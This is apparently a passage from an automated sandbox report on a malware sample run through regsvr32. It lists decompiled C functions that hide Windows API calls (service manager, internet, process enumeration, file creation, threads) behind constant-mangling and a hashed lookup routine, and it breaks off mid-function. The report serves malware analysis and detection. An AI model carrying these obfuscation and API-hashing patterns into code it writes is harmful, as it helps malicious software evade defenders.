                                                                                                            0x04d4c791
                                                                                                            0x04d4c798
                                                                                                            0x04d4c79f
                                                                                                            0x04d4c7a6
                                                                                                            0x04d4c7ad
                                                                                                            0x04d4c7b4
                                                                                                            0x04d4c7bb
                                                                                                            0x04d4c7c2
                                                                                                            0x04d4c7c9
                                                                                                            0x04d4c7d0
                                                                                                            0x04d4c7d7
                                                                                                            0x04d4c7de
                                                                                                            0x04d4c7e5
                                                                                                            0x04d4c805
                                                                                                            0x04d4c817
                                                                                                            0x04d4c81d

                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 04D4C817
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID: )|n
                                                                                                            • API String ID: 2422867632-3781025496
                                                                                                            • Opcode ID: 7d081b82da2f2b765c1eff5e522bd657fe3a5c64de1db55e13d9ac54ccac50ef
                                                                                                            • Instruction ID: 41dbd3c66b0a41b0224726b885038d6dd71884e9edb66fd1e0a50af3770f6a22
                                                                                                            • Opcode Fuzzy Hash: 7d081b82da2f2b765c1eff5e522bd657fe3a5c64de1db55e13d9ac54ccac50ef
                                                                                                            • Instruction Fuzzy Hash: 3F11037690122CBBCF149FE59D4A8DEBF79EF09254F108188B92966120C3759761DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D47E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E04D47E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E04D432C4(_t33);
				_v28 = 0x38698;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0xf80068;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0x9c2a;
				_v12 = _v12 ^ 0xf804c3a3;
				_v8 = 0xd3ebc3;
				_v8 = _v8 << 0x10;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x000f62ee;
				_v16 = 0x690a65;
				_v16 = _v16 | 0xebc01c25;
				_v16 = _v16 ^ 0xebe7ec5f;
				E04D352F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
				_t40 = OpenSCManagerW(0, 0, _a20); // executed
				return _t40;
			}











                                                                                                            0x04d47e1b
                                                                                                            0x04d47e20
                                                                                                            0x04d47e23
                                                                                                            0x04d47e24
                                                                                                            0x04d47e27
                                                                                                            0x04d47e2a
                                                                                                            0x04d47e2b
                                                                                                            0x04d47e2c
                                                                                                            0x04d47e31
                                                                                                            0x04d47e3b
                                                                                                            0x04d47e3e
                                                                                                            0x04d47e41
                                                                                                            0x04d47e48
                                                                                                            0x04d47e4c
                                                                                                            0x04d47e53
                                                                                                            0x04d47e5a
                                                                                                            0x04d47e61
                                                                                                            0x04d47e65
                                                                                                            0x04d47e7d
                                                                                                            0x04d47e80
                                                                                                            0x04d47e87
                                                                                                            0x04d47e8e
                                                                                                            0x04d47e95
                                                                                                            0x04d47ea5
                                                                                                            0x04d47eb2
                                                                                                            0x04d47eb8

                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D47EB2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ManagerOpen
                                                                                                            • String ID: _
                                                                                                            • API String ID: 1889721586-4005583852
                                                                                                            • Opcode ID: cd0a3c79c6f3ca0c79df2846f63ac2039db8adcf820d722151e0df909790d772
                                                                                                            • Instruction ID: 79789ce0d45bacd7e74a2f80158f454d8a995d61a84740fb8f1e4a46ac3c3aea
                                                                                                            • Opcode Fuzzy Hash: cd0a3c79c6f3ca0c79df2846f63ac2039db8adcf820d722151e0df909790d772
                                                                                                            • Instruction Fuzzy Hash: 231136B5C01218FBDF01DF98D84A8CEBFB9EF04344F108089E815A2241D3B58B20EFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D32CC4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E04D32CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t35;
				void* _t42;
				void* _t45;

				_push(_a16);
				_t45 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04D432C4(_t35);
				_v20 = 0xfe94d;
				_v16 = 0xab1c4;
				_v16 = 0x50de48;
				_v16 = _v16 * 0x6c;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xc664fcf6;
				_v8 = 0xfaad6e;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0xffffd3fa;
				_v8 = _v8 ^ 0xf4e1ffa5;
				_v8 = _v8 ^ 0xa25eb8a6;
				_v12 = 0xe37a21;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xd10447cc;
				E04D352F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
				return _t42;
			}










                                                                                                            0x04d32ccb
                                                                                                            0x04d32cce
                                                                                                            0x04d32cd0
                                                                                                            0x04d32cd3
                                                                                                            0x04d32cd6
                                                                                                            0x04d32cd9
                                                                                                            0x04d32cda
                                                                                                            0x04d32cdb
                                                                                                            0x04d32ce0
                                                                                                            0x04d32cea
                                                                                                            0x04d32cf1
                                                                                                            0x04d32d0c
                                                                                                            0x04d32d0f
                                                                                                            0x04d32d13
                                                                                                            0x04d32d1a
                                                                                                            0x04d32d21
                                                                                                            0x04d32d25
                                                                                                            0x04d32d2c
                                                                                                            0x04d32d33
                                                                                                            0x04d32d3a
                                                                                                            0x04d32d41
                                                                                                            0x04d32d45
                                                                                                            0x04d32d49
                                                                                                            0x04d32d59
                                                                                                            0x04d32d68
                                                                                                            0x04d32d6e

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,D10447CC,000FE94D,?,?,?,?,?,?,?,?,?,06CF77FE), ref: 04D32D68
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID: !z
                                                                                                            • API String ID: 1279760036-1244814218
                                                                                                            • Opcode ID: 0031c6f34620949ea4925af606efc386199e2d98a5126e840f02e2f08351811d
                                                                                                            • Instruction ID: d7d7c9e75e70687db84900bc525f1453e220078823e48f007bbee4c2ead25407
                                                                                                            • Opcode Fuzzy Hash: 0031c6f34620949ea4925af606efc386199e2d98a5126e840f02e2f08351811d
                                                                                                            • Instruction Fuzzy Hash: 5511DFB6D04208BBDB01EFE8D94A8DEBFB4EF45304F108488E92566251D3759B20EF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D39A95 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E04D39A95(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				int _t48;
				signed int _t50;

				_push(_a8);
				_push(_a4);
				E04D432C4(_t37);
				_v16 = 0x6c534;
				_v16 = 0x35c0dd;
				_v16 = _v16 >> 8;
				_t50 = 0x1d;
				_v16 = _v16 * 0x68;
				_v16 = _v16 ^ 0x00172ee9;
				_v12 = 0x8fc35e;
				_v12 = _v12 << 1;
				_v12 = _v12 / _t50;
				_v12 = _v12 ^ 0x000a405d;
				_v8 = 0xdb850d;
				_v8 = _v8 / _t50;
				_v8 = _v8 | 0x33c3aaf5;
				_v8 = _v8 ^ 0x33c594a1;
				E04D352F2(_t50, _v8 % _t50, _t50, 0x4f, 0x14006836, 0xfd56727);
				_t48 = InternetCloseHandle(_a8); // executed
				return _t48;
			}









                                                                                                            0x04d39a9b
                                                                                                            0x04d39a9e
                                                                                                            0x04d39aa3
                                                                                                            0x04d39aa8
                                                                                                            0x04d39ab2
                                                                                                            0x04d39abb
                                                                                                            0x04d39ac5
                                                                                                            0x04d39ad0
                                                                                                            0x04d39ad3
                                                                                                            0x04d39ada
                                                                                                            0x04d39ae1
                                                                                                            0x04d39aeb
                                                                                                            0x04d39aee
                                                                                                            0x04d39af5
                                                                                                            0x04d39b03
                                                                                                            0x04d39b06
                                                                                                            0x04d39b0d
                                                                                                            0x04d39b1e
                                                                                                            0x04d39b29
                                                                                                            0x04d39b2e

                                                                                                            APIs
                                                                                                            • InternetCloseHandle.WININET(00172EE9), ref: 04D39B29
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInternet
                                                                                                            • String ID: ]@
                                                                                                            • API String ID: 1081599783-2341061354
                                                                                                            • Opcode ID: 818020f233355629962f419f42ddbe8f717f3b013ee50a7fc40fe265c6eaa119
                                                                                                            • Instruction ID: 945273e3a660ef2921d2a7f9477c77748f34749c6a91f801318d7590c87744b7
                                                                                                            • Opcode Fuzzy Hash: 818020f233355629962f419f42ddbe8f717f3b013ee50a7fc40fe265c6eaa119
                                                                                                            • Instruction Fuzzy Hash: DB112775E00208FBDF04DFE9C94699DBBB2EB44304F10C099E924AB250E7BA9B54DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D49D01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E04D49D01(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E04D432C4(_t32);
				_v16 = 0x4f77f;
				_v16 = 0x81a250;
				_t42 = 0x52;
				_v16 = _v16 / _t42;
				_v16 = _v16 ^ 0x000f3fad;
				_v8 = 0x15d180;
				_v8 = _v8 ^ 0x3a00eb16;
				_v8 = _v8 | 0xa1b05abd;
				_v8 = _v8 ^ 0xbbb018ec;
				_v12 = 0x634245;
				_v12 = _v12 + 0x55ea;
				_v12 = _v12 ^ 0x006de6e2;
				E04D352F2(_t42, _v16 % _t42, _t42, 0x1b0, 0x132bfc3c, 0x9f49d153);
				_push(_a16);
				_t40 = Process32FirstW(_a8); // executed
				return _t40;
			}









                                                                                                            0x04d49d07
                                                                                                            0x04d49d0a
                                                                                                            0x04d49d0d
                                                                                                            0x04d49d10
                                                                                                            0x04d49d15
                                                                                                            0x04d49d1a
                                                                                                            0x04d49d24
                                                                                                            0x04d49d32
                                                                                                            0x04d49d3a
                                                                                                            0x04d49d3d
                                                                                                            0x04d49d44
                                                                                                            0x04d49d4b
                                                                                                            0x04d49d52
                                                                                                            0x04d49d59
                                                                                                            0x04d49d60
                                                                                                            0x04d49d67
                                                                                                            0x04d49d6e
                                                                                                            0x04d49d89
                                                                                                            0x04d49d91
                                                                                                            0x04d49d97
                                                                                                            0x04d49d9c

                                                                                                            APIs
                                                                                                            • Process32FirstW.KERNEL32(000F3FAD,?), ref: 04D49D97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FirstProcess32
                                                                                                            • String ID: m
                                                                                                            • API String ID: 2623510744-1228489174
                                                                                                            • Opcode ID: 3f2d7b86be3fd7bd22f04a055944d160ac4cf9a307f336463c22ccccc1c1cdc1
                                                                                                            • Instruction ID: 602b8e96f47967f0be67f48a4a23c89e09cba565f97ca0cf85a08bd2949bf80b
                                                                                                            • Opcode Fuzzy Hash: 3f2d7b86be3fd7bd22f04a055944d160ac4cf9a307f336463c22ccccc1c1cdc1
                                                                                                            • Instruction Fuzzy Hash: EE01F376E00208BBDF44EFE4DD4689EBFB1EB44314F10C098B924A6251D77A9B649F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D4602C Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 55%
                                                                                                            			E04D4602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				void* _t50;
				signed int _t53;
				long _t57;
				long _t58;

				_t58 = __edx;
				_push(0);
				_push(_a36);
				_t57 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04D432C4(_t42);
				_v32 = 0xf2bcc;
				_v28 = 0x9963f;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x481e97;
				_v12 = _v12 + 0x3bb9;
				_v12 = _v12 | 0xe5ca697e;
				_v12 = _v12 ^ 0xe5cf84b6;
				_v8 = 0xca7b5c;
				_t53 = 0x38;
				_v8 = _v8 / _t53;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x0004807b;
				_v16 = 0xf3cd85;
				_v16 = _v16 ^ 0x0b7576d7;
				_v16 = _v16 ^ 0x0b87a2f8;
				E04D352F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
				return _t50;
			}















                                                                                                            0x04d46037
                                                                                                            0x04d46039
                                                                                                            0x04d4603a
                                                                                                            0x04d4603d
                                                                                                            0x04d4603f
                                                                                                            0x04d46040
                                                                                                            0x04d46043
                                                                                                            0x04d46046
                                                                                                            0x04d46049
                                                                                                            0x04d4604c
                                                                                                            0x04d4604f
                                                                                                            0x04d46052
                                                                                                            0x04d46055
                                                                                                            0x04d46056
                                                                                                            0x04d46057
                                                                                                            0x04d4605c
                                                                                                            0x04d46066
                                                                                                            0x04d4606f
                                                                                                            0x04d46072
                                                                                                            0x04d46075
                                                                                                            0x04d4607c
                                                                                                            0x04d46083
                                                                                                            0x04d4608a
                                                                                                            0x04d46091
                                                                                                            0x04d4609d
                                                                                                            0x04d460a5
                                                                                                            0x04d460a8
                                                                                                            0x04d460ac
                                                                                                            0x04d460b3
                                                                                                            0x04d460ba
                                                                                                            0x04d460c1
                                                                                                            0x04d460dc
                                                                                                            0x04d460f1
                                                                                                            0x04d460f9

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(000F2BCC,0009963F,065F7FFE,00000000,?,000F5428,00000000), ref: 04D460F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 473fedd74ae4a623ca298743d6ffebda1a16a04a3240cc23b0471d744042e6d8
                                                                                                            • Instruction ID: 00a91a3da8d28ae556a9f72a47f15d4084ba4f84ac96c4fc2acac3d4ad558262
                                                                                                            • Opcode Fuzzy Hash: 473fedd74ae4a623ca298743d6ffebda1a16a04a3240cc23b0471d744042e6d8
                                                                                                            • Instruction Fuzzy Hash: A121257290020DBFDF05DF95DC858AFBFB9EB44358F108098FA1462220D7764A64AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D4A036 Relevance: 1.6, APIs: 1, Instructions: 60networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E04D4A036(intOrPtr _a4, long _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t40;
				void* _t51;
				signed int _t52;
				signed int _t53;

				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E04D432C4(_t40);
				_v28 = 0xc6a10;
				_v24 = 0xfaef;
				_v20 = 0;
				_v16 = 0xa1bc2a;
				_v16 = _v16 + 0xffffaa1d;
				_v16 = _v16 ^ 0x00a4ad57;
				_v8 = 0x3e4b3;
				_t52 = 0x68;
				_v8 = _v8 / _t52;
				_t53 = 0x6a;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0x26efe292;
				_v8 = _v8 ^ 0x26eab699;
				_v12 = 0x3502d9;
				_v12 = _v12 * 0x26;
				_v12 = _v12 ^ 0x07d1b182;
				E04D352F2(_t53, _v8 % _t53, _t53, 0x180, 0xba6dd0e5, 0xfd56727);
				_t51 = InternetOpenW(0, _a8, 0, 0, 0); // executed
				return _t51;
			}













                                                                                                            0x04d4a03d
                                                                                                            0x04d4a042
                                                                                                            0x04d4a045
                                                                                                            0x04d4a048
                                                                                                            0x04d4a049
                                                                                                            0x04d4a04a
                                                                                                            0x04d4a04d
                                                                                                            0x04d4a050
                                                                                                            0x04d4a051
                                                                                                            0x04d4a052
                                                                                                            0x04d4a057
                                                                                                            0x04d4a061
                                                                                                            0x04d4a06a
                                                                                                            0x04d4a06d
                                                                                                            0x04d4a074
                                                                                                            0x04d4a07b
                                                                                                            0x04d4a082
                                                                                                            0x04d4a08e
                                                                                                            0x04d4a093
                                                                                                            0x04d4a09b
                                                                                                            0x04d4a0a3
                                                                                                            0x04d4a0a6
                                                                                                            0x04d4a0ad
                                                                                                            0x04d4a0b4
                                                                                                            0x04d4a0ca
                                                                                                            0x04d4a0cd
                                                                                                            0x04d4a0dd
                                                                                                            0x04d4a0ec
                                                                                                            0x04d4a0f2

                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00A4AD57,00000000,00000000,00000000), ref: 04D4A0EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InternetOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2038078732-0
                                                                                                            • Opcode ID: a719cf364fb45ffd86ad1d374b202fba24b484548c5c7e75d3cff7536fc428c4
                                                                                                            • Instruction ID: 3298bbf6cebdaf9c9f3229e0dafd487168d8fae012ff67739372f3a8757390ef
                                                                                                            • Opcode Fuzzy Hash: a719cf364fb45ffd86ad1d374b202fba24b484548c5c7e75d3cff7536fc428c4
                                                                                                            • Instruction Fuzzy Hash: 231144B1D01218FBCB14DFA5DC4A8CEBFB5EF09314F108189B41866250E3B15B20DFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D489C9 Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E04D489C9(void* __ecx, void* __edx, void* _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				intOrPtr _v20;
				void* _t28;
				char _t34;
				void* _t37;

				_push(_a12);
				_t37 = __edx;
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04D432C4(_t28);
				_v20 = 0xfe879;
				_v16 = 0x1b168;
				_v12 = 0x80e690;
				_v12 = _v12 | 0x46582297;
				_v12 = _v12 + 0xffffc97a;
				_v12 = _v12 ^ 0x46d7fd18;
				_v16 = 0x13187e;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x0006b0af;
				_v8 = 0xe112ab;
				_v8 = _v8 ^ 0x04f2baba;
				_v8 = _v8 + 0xfffff742;
				_v8 = _v8 ^ 0x041ecc34;
				E04D352F2(__ecx, __edx, __ecx, 0xa7, 0x5bb15cf1, 0x9f49d153);
				_t34 = RtlFreeHeap(_a4, 0, _t37); // executed
				return _t34;
			}










                                                                                                            0x04d489d0
                                                                                                            0x04d489d3
                                                                                                            0x04d489d5
                                                                                                            0x04d489d7
                                                                                                            0x04d489da
                                                                                                            0x04d489db
                                                                                                            0x04d489dc
                                                                                                            0x04d489e1
                                                                                                            0x04d489eb
                                                                                                            0x04d489f2
                                                                                                            0x04d489f9
                                                                                                            0x04d48a00
                                                                                                            0x04d48a07
                                                                                                            0x04d48a0e
                                                                                                            0x04d48a15
                                                                                                            0x04d48a19
                                                                                                            0x04d48a20
                                                                                                            0x04d48a27
                                                                                                            0x04d48a2e
                                                                                                            0x04d48a35
                                                                                                            0x04d48a55
                                                                                                            0x04d48a63
                                                                                                            0x04d48a69

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(46D7FD18,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 04D48A63
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 907c7cb9df6a94939db9fdef9cbffa6edbe829b78ef88f4eb5270b57f0aedf4f
                                                                                                            • Instruction ID: 1a4ae2308a4c1fecae59c83eb11f67531117d4507f9d55e7f0eb78e3d83024b9
                                                                                                            • Opcode Fuzzy Hash: 907c7cb9df6a94939db9fdef9cbffa6edbe829b78ef88f4eb5270b57f0aedf4f
                                                                                                            • Instruction Fuzzy Hash: 56013971D01308BBDB14DFA5DD46A9EBFB4EF01314F108588A82476250D7B59B54DF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D46CBC Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E04D46CBC(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;
				intOrPtr* _t36;
				void* _t37;
				void* _t40;

				_t40 = __ecx;
				E04D432C4(_t29);
				_v16 = 0x15a4f;
				_v16 = 0x3d6bbe;
				_v16 = _v16 << 0x10;
				_v16 = _v16 + 0x3f64;
				_v16 = _v16 ^ 0x6bbda58e;
				_v12 = 0xa5f035;
				_v12 = _v12 | 0xf21ffb55;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0xffd4e6dd;
				_v8 = 0xd63fc1;
				_v8 = _v8 | 0x77e9870d;
				_v8 = _v8 * 0x30;
				_v8 = _v8 * 0x28;
				_v8 = _v8 ^ 0xfe1e2bfe;
				_t36 = E04D352F2(__ecx, __edx, __ecx, 0x41, 0xd932dbc3, 0x9f49d153);
				_t37 =  *_t36(_t40, __ecx, __edx, _a4); // executed
				return _t37;
			}










                                                                                                            0x04d46cc6
                                                                                                            0x04d46cca
                                                                                                            0x04d46ccf
                                                                                                            0x04d46cd9
                                                                                                            0x04d46ce0
                                                                                                            0x04d46ce4
                                                                                                            0x04d46ceb
                                                                                                            0x04d46cf2
                                                                                                            0x04d46cf9
                                                                                                            0x04d46d00
                                                                                                            0x04d46d04
                                                                                                            0x04d46d0b
                                                                                                            0x04d46d12
                                                                                                            0x04d46d2a
                                                                                                            0x04d46d31
                                                                                                            0x04d46d34
                                                                                                            0x04d46d44
                                                                                                            0x04d46d4d
                                                                                                            0x04d46d53

                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04D46D4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoNativeSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1721193555-0
                                                                                                            • Opcode ID: ad5fa428619d65438e5ec0d8e6b2fe6bd57a7ebf2171d538b6b34230017cd31c
                                                                                                            • Instruction ID: d0a967a4eb4ac5a94e5823161c0b41816fa03cf43125b579e4d2b1f709c3779f
                                                                                                            • Opcode Fuzzy Hash: ad5fa428619d65438e5ec0d8e6b2fe6bd57a7ebf2171d538b6b34230017cd31c
                                                                                                            • Instruction Fuzzy Hash: 57013572D01208FBDB04DF99E94A88DBFB8EF40304F10C198E821B7250D3B45B508F45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D38B6C Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E04D38B6C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
